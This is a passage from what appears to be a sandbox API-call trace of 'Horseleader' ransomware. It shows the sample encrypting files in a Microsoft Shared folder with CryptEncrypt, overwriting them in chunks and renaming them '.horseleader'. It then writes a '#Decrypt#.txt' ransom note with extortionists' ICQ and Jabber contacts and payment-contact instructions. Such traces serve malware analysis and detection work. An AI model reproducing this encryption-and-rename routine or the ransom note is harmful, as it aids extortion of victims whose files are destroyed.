"c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.258] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 71 [0228.258] StrStrW (lpFirst="PICTIM32.FLT", lpSrch=".txt") returned 0x0 [0228.258] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=73080) returned 1 [0228.258] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.259] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.295] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.295] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.296] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x66bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.296] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.300] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.300] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.300] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xcd78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.300] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.306] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.306] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.307] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.307] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.307] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.307] CloseHandle (hObject=0x158) returned 1 [0228.307] GetProcessHeap () returned 0x780000 [0228.307] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.308] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.horseleader") returned 83 [0228.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt.horseleader")) returned 1 [0228.309] GetProcessHeap () returned 0x780000 [0228.309] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.309] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x49f80, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="PNG32.FLT", cAlternateFileName="")) returned 1 [0228.309] lstrcmpiW (lpString1="PNG32.FLT", lpString2="Windows") returned -1 [0228.309] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 68 [0228.309] StrStrIW (lpFirst="PNG32.FLT", lpSrch=".horseleader") returned 0x0 [0228.309] lstrcmpW (lpString1="PNG32.FLT", lpString2="#Decrypt#.txt") returned 1 [0228.309] lstrcmpW (lpString1="PNG32.FLT", lpString2="_uninstalling_.png") returned 1 [0228.309] lstrlenW (lpString=".testttjffg") returned 11 [0228.309] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT", lpSrch=".testttjffg") returned 0x0 [0228.309] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.309] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.309] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.310] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 68 [0228.310] StrStrW (lpFirst="PNG32.FLT", lpSrch=".txt") returned 0x0 [0228.310] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=302976) returned 1 [0228.310] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.310] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.337] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.337] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.338] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x227c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.338] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.344] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.344] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.344] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x44f80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.344] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.349] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.349] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.350] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.350] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.350] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.355] CloseHandle (hObject=0x158) returned 1 [0228.355] GetProcessHeap () returned 0x780000 [0228.355] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.355] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.horseleader") returned 80 [0228.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt.horseleader")) returned 1 [0228.357] GetProcessHeap () returned 0x780000 [0228.357] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.357] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd53d4900, ftCreationTime.dwHighDateTime=0x1cb7002, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd53d4900, ftLastWriteTime.dwHighDateTime=0x1cb7002, nFileSizeHigh=0x0, nFileSizeLow=0x44780, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WPGIMP32.FLT", cAlternateFileName="")) returned 1 [0228.357] lstrcmpiW (lpString1="WPGIMP32.FLT", lpString2="Windows") returned 1 [0228.357] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 71 [0228.357] StrStrIW (lpFirst="WPGIMP32.FLT", lpSrch=".horseleader") returned 0x0 [0228.357] lstrcmpW (lpString1="WPGIMP32.FLT", lpString2="#Decrypt#.txt") returned 1 [0228.357] lstrcmpW (lpString1="WPGIMP32.FLT", lpString2="_uninstalling_.png") returned 1 [0228.357] lstrlenW (lpString=".testttjffg") returned 11 [0228.357] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT", lpSrch=".testttjffg") returned 0x0 [0228.357] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.357] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.357] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.360] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 71 [0228.360] StrStrW (lpFirst="WPGIMP32.FLT", lpSrch=".txt") returned 0x0 [0228.360] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=280448) returned 1 [0228.360] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.360] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.363] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.363] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.374] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1fbc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.374] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.376] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.376] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.376] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3f780, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.377] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.441] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.441] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.441] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.442] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.442] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.442] CloseHandle (hObject=0x158) returned 1 [0228.442] GetProcessHeap () returned 0x780000 [0228.442] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.442] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.horseleader") returned 83 [0228.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt.horseleader")) returned 1 [0228.443] GetProcessHeap () returned 0x780000 [0228.444] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.444] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd53d4900, ftCreationTime.dwHighDateTime=0x1cb7002, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd53d4900, ftLastWriteTime.dwHighDateTime=0x1cb7002, nFileSizeHigh=0x0, nFileSizeLow=0x44780, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WPGIMP32.FLT", cAlternateFileName="")) returned 0 [0228.444] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0228.444] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\#Decrypt#.txt") returned 72 [0228.444] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0228.445] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0228.445] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0228.446] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0228.446] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0228.447] CloseHandle (hObject=0x21c) returned 1 [0228.447] GetProcessHeap () returned 0x780000 [0228.447] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0228.447] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Help", cAlternateFileName="")) returned 1 [0228.447] lstrcmpiW (lpString1="Help", lpString2="Windows") returned -1 [0228.447] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help") returned 55 [0228.447] lstrcmpW (lpString1="Help", lpString2=".") returned 1 [0228.447] lstrcmpW (lpString1="Help", lpString2="..") returned 1 [0228.448] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0228.448] GetProcessHeap () returned 0x780000 [0228.448] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0228.448] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*") returned 57 [0228.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0228.449] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0228.449] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\.") returned 57 [0228.449] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0228.449] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0228.449] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0228.449] wnsprintfW (in: 